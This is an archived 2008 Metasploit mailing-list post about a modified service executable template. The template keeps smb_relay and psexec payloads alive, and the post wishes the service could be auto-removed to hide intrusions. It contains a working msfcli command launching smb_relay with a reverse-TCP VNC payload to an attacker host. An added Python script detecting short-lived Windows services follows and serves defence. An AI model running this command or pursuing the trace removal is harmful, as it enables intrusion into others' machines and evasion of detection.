Metasploit mailing list archives
NTLM relay implemented in Metasploit 3?
From: sigtrap at sigtrap.org (sigtrap)
Date: Thu, 07 Feb 2008 10:24:11 +0100
Hi,

I have posted a service template.exe to this list before. I'll post it again because it works like a charm when you look for "Wireless Zero Configuration" hosts. The password is 31 characters. Not 8 :-)

Here is my old post:

----------------------------

I now have a new "service template.exe". I managed to steal 10 minutes from my friend Magnus Br?ding, in which he threw together a service executable template PoC (yes, we're sorry it's bloated :-))

It's attached with the password: "password" (without the quotes). Got it? ;-)

If you backup the original template.exe and use this instead, the exploits psexec and smb_relay will work as intended (other exploits, that don't expect a service exe, probably won't work).

Eg:

./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7 PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts. The payload is executed in a new thread. The service controller *doesn't* kill the process after 30 seconds anymore, as it does with the normal template.exe. When you terminate the vncclient the payload terminates the process through the "EXITFUNC=process". The Windows service MMC snap-in will now report the created service as "stopped".

If we could now just make the handler (i.e. the one that starts the VNC client on the attacking computer) report back to the exploit when the payload on the victim computer has ended (and thus its process has also terminated in this case), it would be easy to remove the service and executable on the victim computer, thereby leaving no bigger trace behind of the intrusion. I don't know how to do this, but it would be really great if someone did.

------------------

Regards
//Sigtrap

-----Original Message-----
From: H D Moore <hdm at metasploit.com>
The three big missing features:
3) A services wrapper around the EXE that prevents it from being killed after ~30 seconds.
-HD
-------------- next part --------------
A non-text attachment was scrubbed...
Name: template.exe.bin.pgp
Type: application/octet-stream
Size: 224107 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080207/c3ddea9c/attachment.obj>
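The post describes the trace this technique leaves on the target: a service is installed, starts, and shortly afterwards is reported as "stopped" once the payload's process exits. As an added example that is not part of the original thread, the following Python correlates Windows Service Control Manager events 7045 (service installed) and 7036 (service state change) to flag newly installed services that stop within a short window of being installed; the log lines, service name and file path are constructed and simplified to one line per event.

```python
import re
from datetime import datetime

# Constructed sample log (not from the original post): "<ISO timestamp> <EventID> <message>".
# Real 7045 messages span several lines; they are flattened here to one line per event.
SAMPLE_LOG = r"""
2008-02-07T10:20:01 7045 A service was installed in the system. Service Name: pKwRzQsd Service File Name: \\?\C:\WINDOWS\pKwRzQsd.exe Service Type: user mode service Service Start Type: demand start
2008-02-07T10:20:02 7036 The pKwRzQsd service entered the running state.
2008-02-07T10:20:05 7036 The pKwRzQsd service entered the stopped state.
2008-02-07T10:25:00 7045 A service was installed in the system. Service Name: Spooler Service File Name: C:\WINDOWS\System32\spoolsv.exe Service Type: user mode service Service Start Type: auto start
2008-02-07T10:25:01 7036 The Spooler service entered the running state.
"""

INSTALL_RE = re.compile(r"Service Name: (?P<name>.+?) Service File Name: (?P<path>.+?) Service Type:")
STATE_RE = re.compile(r"The (?P<name>.+?) service entered the (?P<state>running|stopped) state")


def parse_line(line):
    """Split a flattened log line into (timestamp, event id, message)."""
    ts, event_id, msg = line.split(" ", 2)
    return datetime.fromisoformat(ts), int(event_id), msg


def find_short_lived_services(log_text, window_seconds=60):
    """Return installs (7045) followed by a stop (7036) of the same service within the window.

    A service that is installed and stopped again within seconds matches the
    install-run-exit pattern described in the post and deserves a closer look.
    """
    installs = {}   # service name -> (install time, image path)
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, event_id, msg = parse_line(raw)
        if event_id == 7045:
            m = INSTALL_RE.search(msg)
            if m:
                installs[m["name"]] = (ts, m["path"])
        elif event_id == 7036:
            m = STATE_RE.search(msg)
            if m and m["state"] == "stopped" and m["name"] in installs:
                installed_at, path = installs.pop(m["name"])
                lifetime = (ts - installed_at).total_seconds()
                if lifetime <= window_seconds:
                    findings.append({"service": m["name"], "image_path": path, "lifetime_s": lifetime})
    return findings
```

Services that legitimately start and stop quickly (installers, on-demand helpers) will also match, so the image path and installing account should be reviewed before treating a hit as an intrusion.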